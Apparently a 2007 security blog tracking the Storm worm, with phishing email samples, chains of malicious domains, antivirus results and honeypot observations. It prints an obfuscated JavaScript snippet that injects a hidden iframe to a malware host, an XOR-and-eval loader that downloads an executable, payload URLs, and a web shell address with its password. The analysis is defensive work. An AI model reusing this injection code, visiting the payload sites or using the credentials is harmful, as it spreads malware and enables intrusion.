Stormworm - iframe hell.

This morning we started receiving dual language Storm worm Emails:

From: fuzzarnsjjvr@sdc-dsc.gc.ca
Date: Sep 28, 2007 7:12 AM
Subject: Don't forget to play a game today
To: me



Too many hot games to mention; get 1000 free games. http://68.77.xx.xx/

Смотри что о тебе пишут,ну ты и сука,смотрите все! вот адресс
http:// bl0cker.info/ suki .php?new=pidori

(Spaces and xx's added to protect from accidental clicks)

The Russian suki.php page doesn't yet resolve (404 error) however there is an index page and it has javascript iframes pointing to

http:// 58.65.239.66 /~lem0n/st/go.php?sid=1
http:// 58.65.239.66 /~lem0n/st/go.php?sid=2
http:// 58.65.239.66 /~lem0n/st/go.php?sid=3
http:// 58.65.239.66 /~lem0n/st/go.php?sid=4

the sid=1 sid=2 and sid=3 pages are all fake error pages with more iframes:

http:// bl0cker.info /mail/cn.php
http:// lem0n.info /xxx/iframe.php
http:// lem0n.info /xxx/m/iframe.php
http:// bl0cker.org /xxx/iframe.php
http:// space-sms.info /xxx/iframe.php
http:// bl0cker.info /bn/index.php

sid=4 is a javascript encoded page that trys to download http:// bl0cker.info /bn/exe.php

So how deep can it get? I followed the white rabbit through a few more links:

cn.php is an iframe that points to http:// eliteproject.cn /ts/in.cgi?alex

lem0n.info /xxx/iframe.php is a javascript that points to http:// bl0cker.info /bn/index.php

lem0n.info /xxx /m/iframe.php: is a lot of errors:

Warning: fopen(redir.txt) [function.fopen]: failed to open stream:
Permission denied in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 40

Warning: flock() expects parameter 1 to be resource, boolean
given in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 41

Warning: ftruncate(): supplied argument is not a valid stream
resource in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 42

Warning: fwrite(): supplied argument is not a valid stream
resource in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 43

Same errors in http://bl0cker.org /xxx/iframe.php and http:// space-sms.info /xxx/iframe.php.

eliteproject.cn /ts/ in.cgi?alex is an mpack that points to http:// superengine.cn /1278/file.php (binary file)

In summary, possible new Storm domains:

superengine.cn
eliteproject.cn
space-sms.info
lem0n.info
bl0cker.org
bl0cker.info

None of these are fastflux --yet.

Space-sms, lem0n.info, bl0cker.org and bl0cker.info all use the same name servers, ns1 and ns2.spektor.ws.

NS2 points to the same IP (58.65.239.66) as the A records for the new domains.

Ever Snort Pot?

For the last couple weeks DISOG has been running dual TOR Exit Nodes for the purpose of identifying malicious activities. We just made up the buzz-word SnortPot...it made a great title for this entry. Using the SNORT IDS we monitored our exit nodes.

We identified six irc networks operating on non-standard ports. Upon further investigation we found four of them were known botnets. These are probably botnet researchers who are too chicken to use their own IPs, rather than botnet owners. The login sequence was captured by the IDS and appeared to be bot like.

There were hundreds of sql injection attacks on servers - High profile agencies like NASA.gov, NIH.gov, MoneyFactory.gov, DCHealth.gov, UTCourts.gov, and VOA.gov were all targeted using what appeared to be automated scripts (the alerts were flying by so fast it was hard to keep up with the snort tail).

We registered over 3000 porn web hits in one day, with 448 name/password combinations using plain text base64 authentication. I Googled some of the credentials and found they had been posted online and had been indexed by Google. In many cases the credentials were posted two or more weeks ago.

Three sites that triggered the child porn rules were turned over to the authorities. All of them were located in Russia.

Our network graphs showed systems in Russia were visited more frequently than any other country. Following Russia was Japan. Around 40% of the packets routed to those two countries.

Only a small percent used tor as a Socks 4a Proxy, so they could perform DNS queries through our systems. Most of those DNS queries were for different torrent trackers. In our experience the majority of our alerts were related to torrents or porn. It is unclear how many of these torrents were in fact porn.

18 malicious executable files were downloaded, not including 1676 CME711 (Storm Worm) binaries. It was obvious that at least one person used our exit nodes to routinely pull binaries from the Storm Servers. (Some researchers have no shame!)

As honeypots go, it was a fairly easy one to setup. Download the TOR Client/Server software, configure it to allow exits, Configure SNORT with the SourceFire VRT and Bleeding Edge rulesets.

The down side is its very hard to keep up with the alerts. Even with the help of BASE we had our hands full tracking down each alert. Even on a slow exit node you could see dozens of alerts per minute.

The IDS was not used to collect data on any of our visitors. We simply used it to trigger signatures that had already been developed. Several emails triggered on porn related topics, and when we identified these alerts were capturing email traffic we commented them out of our signature base to protect the privacy of those using the TOR network.

We could have easily captured all the data and performed more detailed analysis. However, we felt an IDS would give a high level idea of the malicious activities passing through the TOR network while protecting the privacy of legitimate TOR users.

After seeing the alerts TOR traffic created when leaving my exit nodes, I wonder how safe running an open proxy really is. Who is ultimately at risk when someone uses your IP address to attack a server, or to view child porn? The answer hasn't yet been answered in a US Court. So for now, our exit nodes have been disabled.

SnortPots are used every day by security gurus. Many of these types of honeypots sit at the edge of ISP or Corporate IP space. Be aware that any unencrypted internet traffic is visible to the casual snooper.

So whats the difference between using Snort as an IDS or as a Honeypot? - Nothing. I expect everyone to call their Snort sensors 'SnortPots' from now forward. :)

Storm gearing back up

CME711 - aka Stormworm - has shutdown their DNS again. This likely means they are changing their tactics again.

Watch your mail box for the next round of spam and let us know what you see by posting a comment using the link below.

Remote PHP Includes

Some of the most delightful things come via public mailing lists.

This goody brought to you by Dave Arrowsmith via the Whitestar List.

"I implimented [sic] a .htaccess Rule to 301 redirect of libwww-perl etc to google.com

RewriteCond %{HTTP_USER_AGENT} ^libwww-perl.*$ [NC]
RewriteRule \.*$ http://www.google.com [R,L]

and so they came..."

Probably not the greatest idea to redirect all of your attacks towards an innocent party, http://0.0.0.0/ would have worked just as well.
In the end Dave had a couple scripts directed at what I only assume are phpbb installs:

http:// www.kinkware.com /shop /pub /error.txt - R57Shell - password protected - user: mike pass: rico

Dave contacted Kinkware, who had this to say:

Hi,

We will investigate this issue. In the mean time can you please
provide us your IP address so we can block all traffic to
your address so that you are not affected by this.
Regards,

Tarinder Singh, Systems Administrator
Net Logistics Pty. Ltd.
http://www.netlogistics.com.au

Some others he saw but did not contact:

http:// usuarios.arnet.com.ar / larry123/safe.txt - php id script.
http:// 71.102.93.10 /WTS /bin /hak/idpitbull.txt - another php id script.
http:// www.compassolutions.com /navegacion/id.txt - another id script.
http:// www.yesevent.org /tmp/echo3 - yet another php id script.
http:// coyoteco.iespana.es /cmd.txt - ...one last php id script.
http:// www.tukangbecak.com /ban.gif - Safemode check script.
http:// sapikeren.net /yogya-carder/ indonesia/Themes/nebula/temp - Another PHP Safemode check script.

So lets recap:

Dave helped protect himself by redirecting perl user agents elsewhere.
Dave SHOULD redo his .htaccess file to keep from reflecting his attacks to an innocent person.
You should follow suit. Further more, if not required, remove access to: perl, python, ruby, C(++), Java, curl, wget, socat, netcat, cryptcat, ftp, sftp, and telnet. Then drop outbound requests to ports < 1024

Mpack Decode Requests

I've seen quite a rise of javascript decoding questions on different mailing lists. This evening one from D-Shield was waiting in my email box.

Turns out Dan needed to figure out what this code does:

&lt;script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';
s+='0600730700820650770690321151140990610341041161161120580470471090971140991
11098101114110097114100111';s=s+'11010504609911110904712004710511010010112004
6112104112034032119105100116104061051032104101105103104';s=s+'116061051032115
116121108101061034100105115112108097121058110111110101034062060047073070082065077069';
s=s+'062032';t='';l=s.length;i=0;while(i&lt;(l-1)){for(j=0;j&lt;3;j++){t+=s.charAt(i);i++;}
if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}
nbsp();&lt;/script>&lt;!-- c4 -->

I'm sure the Internet Storm Center (ISC) handlers get hundreds of requests like this every month. Using methods like those listed here: http://handlers.sans.org/dwesemann/decode/ I was able to turn that code into human readable:

&lt;/textatea>&lt;/textarea>&lt;IFRAME src="http:// marcobernardoni. com /x /index.php" width=3 height=3 style="display:none">&lt;/IFRAME>

(Spaces added to protect from accidental clicks)

The html closing tag is to evade techniques like the one
described by Tom Liston here: http://isc.sans.org/diary.html?storyid=2268

marcobernardoni.com is running on an IP out of Hong Kong and the index page listed has a mpack javascript, which attempts several exploits to push file.php...Of course its a windows PE binary, however it seems to be broken.

Domain Name: MARCOBERNARDONI.COM
Registrar: ONLINENIC, INC.
Whois Server: whois.35.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS1.NAMESELF.COM
Name Server: NS2.NAMESELF.COM
Status: clientTransferProhibited
Updated Date: 08-jul-2007
Creation Date: 28-may-2007
Expiration Date: 28-may-2008

Registrant:
FuzioN FuzioN fuzka@bk.ru +7.9015371916
FuzioN inc
/dev/null
Moskow,babruysk,RU 117625


Domain Name:marcobernardoni.com
Record last updated at 2007-07-08 15:30:57
Record created on 2007/5/28
Record expired on 2008/5/28
A RECORD: 58.65.234.161

Protect yourself: Turn off Javascript Completely, or only allow it for certain sites using the Firefox NOSCRIPT plugin, and keep your application patches up to date!

Storm Fastflux Resumes

Reports came in from The Shadowserver Foundation that the Stormworm Fast Flux domains have started resolving, and additionally freenfltracker.com can be added to that list.

So, if you manage your own DNS, add a zone for freenfltracker.com and point it to 127.0.0.1.

If you're a user and get an email pointing to freenfltracker.com, delete it. Don't worry about forwarding it to us, we have enough of them.

UPDATE: Well that was quick, freenfltracker.com has been suspended thanks to the members of the Drone Armies list.

Other Malware

Things have been so focused on CME711 lately, I wanted to take a minute and remind everyone there are other problems we will be trying to track over the next several weeks.

Paperghost's blog, Vital Security got me interested in the latest Skype Worm. He linked to SpywareGuide which has a great writeup. I managed to get my hands on a copy of the binary before the end of the day. I am anxious to look at it as well.

The second interesting blog post I saw today pointed me to http:// ip.btscan.com/ jdwin /webmm /mm.htm which is encoded ASCII VBScript created to download http:// ip.btscan.com /jdwin /soft / 3e5a00d54bd4f644.exe. (Spaces added to keep from accidental clicking)

We're going to keep our eyes on storm, but we don't want to develop tunnel vision.

Stormworm Tactics Change to Football Fungus

Some recent changes involving storm:

Starting about 13:50 GMT Randy V noticed the domains started rotating the IP's less frequently. Looking back at my logs I came up with this:

2007-09-08 13:49 (GMT): 12.216.204.171
2007-09-08 13:49 (GMT) - 2007-09-08 13:57 (GMT): 208.115.203.105
2007-09-08 13:58 (GMT) - 2007-09-08 14:03 (GMT): 76.226.146.196
2007-09-08 14:04 (GMT) - 2007-09-08 14:20 (GMT): 72.40.18.87
2007-09-08 14:21 (GMT) - 2007-09-08 14:30 (GMT): 209.30.158.167
2007-09-08 14:31 (GMT) - 2007-09-08 14:49 (GMT): 70.129.33.116
2007-09-08 14:50 (GMT) - 2007-09-08 15:15 (GMT): 74.73.209.16
2007-09-08 15:17 (GMT) - 2007-09-08 15:26 (GMT): 121.114.132.128
2007-09-08 15:26 (GMT) - 2007-09-08 15:34 (GMT): 75.132.218.100
2007-09-08 15:35 (GMT) - 2007-09-08 15:43 (GMT): 75.66.243.62
2007-09-08 15:44 (GMT) - NOW: 127.0.0.1

From 15:44 to ~17:00 the index page showed:

Welcome to nginx!

Now the index page is NFL related (and nicely done) which is sharing NFLTracker.exe (NFLTracker.exe - Infected: Trojan.Peed.III). Its not using any of the xor'd javascript or browser exploits. This page is strictly social engineering.

(DISOG Screen Capture: Sept 8, 2007)

Our guess is the domains will be changing soon, with football related names - or that there will be mass infection of football related sites with frames pointing to the peer pages.



UPDATE: Binary is now called 'tracker.exe'

Opps, guess I pissed off Storm! :)

I started playing with the storm DNS today, not realizing how quickly I was querying the domains.

The DDOS took me offline for about 2 hours today before it was mitigated.



The DDOS was ~6Mbps, with spikes between 10 and 12 Mbps. It consisted of both syn packets to random ports as well as ICMP with the payload "abcdefghijklmnopqr".



I was able to self mitigate down to 2-3Mbps, but the spikes still kept me off the net. My ISP was able to completely mitigate the attack and wish me well.


I took a few minutes and ran tcpdump - mostly to figure out how to identify the icmp payloads. In about five minutes time I captured 1,983,749 packets generated by 1605 unique IP addresses.

This attack was just enough to get my attention. The networks full power was not flexed and I was back online fairly quick. He could have made it much worse for me. This guy is experienced, there is no question - frankly, I'm excited!

NOTE: The DDoS attack was on my Honeypot IP. Not the website.

fncarp.com

A friend just alerted me: the domain fncarp.com is now suspended.

$ whois fncarp.com
...
Status:SUSPENDED
Note: This Domain Name is Suspended. In this status the domain name
is InActive and will not function.

CME711 (Storm) using TOR rouse

This morning I woke up to the latest storm page...

<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">
<html>
<head>
<title>Tor: anonymity online</title>
</head>
<body>
<table border=0 width=\"500\">
<tr><td><img src=\"img/tor1.gif\"></td><td><h2>Tor: anonymity online</h2></td></tr>
<tr><td colspan=\"2\">
<br>
Tor is a toolset for a wide range of organizations and people that want to improve their safety and security on the Internet. Using Tor can help you anonymize web browsing and publishing, instant messaging, IRC, SSH, and other applications that use the TCP protocol. Tor also provides a platform on which software developers can build new applications with built-in anonymity, safety, and privacy features.
<br><br>
Tor aims to defend against traffic analysis, a form of network surveillance that threatens personal anonymity and privacy, confidential business activities and relationships, and state security. Communications are bounced around a distributed network of servers called onion routers, protecting you from websites that build profiles of your interests, local eavesdroppers that read your data or learn what sites you visit, and even the onion routers themselves.<br><br>
<a href=\"tor.exe\"><img src=\"img/tor2.png\" border=0></a>
</td></tr>
</table>
</body>
</html>

The text is a word for word cut and paste from the official TOR website, tor.eff.org.

In summary, they're wagering more clicks by offering The Onion Router (TOR) Proxy. Of course the binary is the standard CME711 trojan, nothing so fancy. At least they could have included TOR in the download!

The files file.php, sony.exe and tor.exe are resolving while video.exe, setup.exe and labor.exe no longer resolve.

UPDATE: TrendMicro has a nice writeup on this too: http://blog.trendmicro.com/nuwar-poses-as-tor-proxy/

Storm, meet Danchev - and SMTP Honeypots.

Dancho Danchev has been playing around with storm's fastflux and created some neat pictures showing how dynamic this network actually is.

His blog post is located here: http://ddanchev.blogspot.com/2007/09/storm-worms-fast-flux-networks.html

DISOG has been running internal SMTP honeypots for Stormworm since around August 15th. Since that date we've captured over 22,000 unique IP addresses!

Today was a slow day, 1651 unique IPs in just under 6000 emails. Since September 1st, we've managed to capture over 4685 unique IP addresses.

(Note, many IP's have been cleaned already, they are posted here for historical purposes only)

Stormworm DNS Failures

Starting just before noon (UTC) Sept 4th our sensors indicated a significant drop in traffic from the storm botnet as DNS for 5 of the domains started failing.

There has been a total DNS Blackout on these five domains since 1200 UTC:

tibeam.com, snbane.com, snlilac.com, fncarp.com, and ltbrew.com

The following domains are still resolving:

kqfloat.com, yxbegan.com, qavoter.com, ptowl.com, wxtaste.com eqcorn.com, and bnably.com.

(For those of you blindly clicking links, don't visit those sites...nothing good will come of it)

UPDATE: The servers are stable again, all domains are resolving as of 1400 UTC.

Latest Stormworm sharing Labor Day greetings

The CME-711 (Stormworm) peers are now spreading windows executable files with the following names:

file.php, video.exe, setup.exe, sony.exe and labor.exe

Sony.exe and labor.exe are new over the last 48 hours. Be sure to update your IDS Signatures.

Labor.exe is in reference to the Labor Day holiday:

Our Greeting System has a Labor Day card for you, go here to pick it up:

http:// yahoo.com /07cards/ greet1?[random hex string]

We're getting a new file on each download attempt again:

413801f06694ad17a7fa03508317fdac labor.exe
4f69c5550a497a02e0f690945925f398 labor.exe
024bf16416645df65358777b214d7997 labor.exe
2aa54149fcfc7ebaa960a8d5648d7dbb labor.exe
6cd2ed30fc3653f241b0702ef4c6f3c6 labor.exe
95b57c8cf2022317aafca06dae2d14be labor.exe
352cf8ef2bbca763d2d03e83fb86c9fd labor.exe
781e08a5dcc2c53646ed097e533d6659 labor.exe
accc4e975b8ab70b4286d113fe5e09dc labor.exe
7375b5c6614cf1a24713949a2ea9800a labor.exe
d43611911af1f7a2401faab91214c2bc labor.exe
cbe59b6688925857ab76301ce61919e5 labor.exe
0b9b061d368763ab51bf6d78f3c36086 labor.exe
651709024ebb9b830fdb9fca161348ae labor.exe

Our MD5 list has been updated, identifying the 26,200+ binaries we've captured. You can view it here.

Peacomm gets scrappy with Kaspersky

This was sent to us by a reader earlier this week:

<iframe src=\"http://kqfloat.com/ind.php\" alt=\"BYDLOSHKA\" height=\"1\" width=\"1\"></iframe>

I spent a few minutes looking at the code this evening...

Downloads xored javascript (like usual) ->

function xor_str(plain_str, xor_key){ var xored_str = \"\";
for (var i = 0 ; i < plain_str.length; ++i) xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i)); return xored_str; } function kaspersky(suck,dick){}; function
kaspersky2(suck_dick,again){};var plain_str =
....
....
SNIP
....
....
var xored_str = xor_str(plain_str, 200); eval(xored_str);

which downloads -> 'http:// fncarp.com /sony.exe' using the useragent:

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1921)

Sony.exe appears to be static, just like video.exe and setup.exe (c05893a656b54164fb486028309bd89e)

DISOG Site Changes

Since our site is mostly a news/blogging site, we've changed things around and are now using a blogger style layout.

I prefer the black background, and hope you enjoy it as well.

I tried to make sure timestamps and text formatted properly during the conversion, however there may still be bugs. Please let me know via email if you see anything that needs fixing.

Peed Goes Static

For the last few days, the Peed servers have stopped rotating their malware. They are sticking with the static MD5 sum of c05893a656b54164fb486028309bd89e.

Most of the major Antivirus vendors are aware of the file:

File setup.exe received on 09.01.2007 17:54:57 (CET)
Antivirus	Version	Last Update	Result
AhnLab-V3	2007.9.1.0	2007.09.01	Win32/Zhelatin.worm.138240.B
AntiVir	7.4.1.66	2007.08.31	Worm/Zhelatin.HJ
Authentium	4.93.8	2007.09.01	W32/Tibs.XB
Avast	4.7.1029.0	2007.09.01	Win32:Tibs-BCY
AVG	7.5.0.484	2007.08.31	Generic6.WTZ
BitDefender	7.2	2007.09.01	Trojan.Peed.PB
CAT-QuickHeal	9.00	2007.09.01	-
ClamAV	0.91.2	2007.09.01	-
DrWeb	4.33	2007.09.01	BackDoor.Groan
eSafe	7.0.15.0	2007.08.29	-
eTrust-Vet	31.1.5100	2007.08.31	Win32/Pecoan
Ewido	4.0	2007.09.01	-
FileAdvisor	1	2007.09.01	-
Fortinet	3.11.0.0	2007.09.01	W32/Tibs@mm
F-Prot	4.3.2.48	2007.08.31	W32/Tibs.XB
F-Secure	6.70.13030.0	2007.08.31	Email-Worm.Win32.Zhelatin.hj
Ikarus	T3.1.1.12	2007.09.01	Backdoor.Win32.Agent.amd
Kaspersky	4.0.2.24	2007.09.01	Email-Worm.Win32.Zhelatin.hj
McAfee	5110	2007.08.31	W32/Nuwar@MM
Microsoft	1.2803	2007.09.01	-
NOD32v2	2495	2007.09.01	-
Norman	5.80.02	2007.08.31	W32/Tibs.dam
Panda	9.0.0.4	2007.09.01	Trj/Alanchum.MV
Prevx1	V2	2007.09.01	-
Rising	19.38.52.00	2007.09.01	Worm.Mail.Win32.Zhelatin.dau
Sophos	4.21.0	2007.09.01	W32/Bagz-I
Sunbelt	2.2.907.0	2007.08.31	Trojan-Downloader.Win32.Tibs.jy
Symantec	10	2007.09.01	Trojan Horse
TheHacker	6.1.9.175	2007.08.31	W32/Zhelatin.hj
VBA32	3.12.2.3	2007.09.01	Email-Worm.Win32.Zhelatin.hj
VirusBuster	4.3.26:9	2007.09.01	I-Worm.Zhelatin.AA
Webwasher-Gateway	6.0.1	2007.08.31	Worm.Zhelatin.HJ
Additional information
File size: 138240 bytes
MD5: c05893a656b54164fb486028309bd89e
SHA1: 8ad506547710d61a6ac0613fdb1d290911f8e600

(Virustotal Results, http://www.virustotal.com)

As you can see, a select few still miss it, so please be careful clicking on those links in email or blog posts!


UPDATE: A closer look at our binaries over the last few days shows that we're still getting random binaries, but only a couple hundred a day, instead of several thousand. By far the most common binary appears to be c05893a656b54164fb486028309bd89e.

Targeted Storm

This morning I woke up to half a dozen targeted Storm Greetings in my mailbox. They looked like this:

Movie-quality postcard for (My Email Account Name)

Class mate(yexnjcegftuory@mittromney.com) has created Movie-quality postcard for you (My Email Account Name)
at lavacards.com.

To see your custom Movie-quality postcard, simply click on the following link:

http://xxx.xxx.xxx.xxx/

Send a FREE greeting card from lavacards.com whenever you want by visiting us at:
This service is provided and hosted by lavacards.com.

These are the first to include the account name used in the email. People may believe the authenticity of these emails because they do appear more targeted.